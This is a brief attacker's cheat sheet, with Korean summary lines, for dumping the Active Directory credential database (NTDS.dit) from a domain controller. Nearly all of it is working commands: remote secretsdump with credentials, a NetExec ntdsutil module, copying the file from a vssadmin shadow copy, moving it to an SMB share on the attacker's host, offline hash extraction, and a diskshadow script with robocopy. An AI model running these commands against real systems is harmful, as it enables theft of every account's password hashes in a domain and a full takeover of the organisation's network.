요약

• 도메인 내의 모든 계정과 비밀번호 정보가 담긴 유일한 파일
• 일반 PC에는 없고, 오직 DC 서버에만 존재.
• 공격자가 이 파일을 복사해가는 순간 그 회사의 보안은 사실상 끝난 것과 다름 없다.
• 위치: C:\\\\Windows\\\\NTDS\\\\ntds.dit

공격

impacket-secretsdump

impacket-secretsdump [Domain]/[User]:[Password]@DC_$IP -just-dc -output dc_dump

NetExec

nxc smb $IP -u [username] -p [password] -M ntdsutil

vssadmin

<aside>

Create a shadow copy of C:

• we can use vssadmin to create a Volume Shadow Copy (VSS) of the C: drive or whatever volume the admin chose when initially installing AD.

vssadmin CREATE SHADOW /For=C:

Successfully created shadow copy for 'C:\\\\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy2

Copy NTDS.dit from the VSS

C:\\\\NTDS> cmd.exe /c copy \\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy2\\\\Windows\\\\NTDS\\\\NTDS.dit C:\\\\NTDS\\\\NTDS.dit

Create a share with smbserver

impacket-smbserver share . -smb2support -user test -password test

Transfer NTDS.dit to attacker host

C:\\\\NTDS> cmd.exe /c move C:\\\\NTDS\\\\NTDS.dit \\\\\\\\$IP\\\\share

Extract hashes from NTDS.dit

impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL

</aside>

Script for NTDS.dit save

# save this in script.txt
set metadata C:\\Windows\\Temp\\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

# run diskshadow
diskshadow /s script.txt

# copy ntds to c
robocopy /b E:\\Windows\\ntds . ntds.dit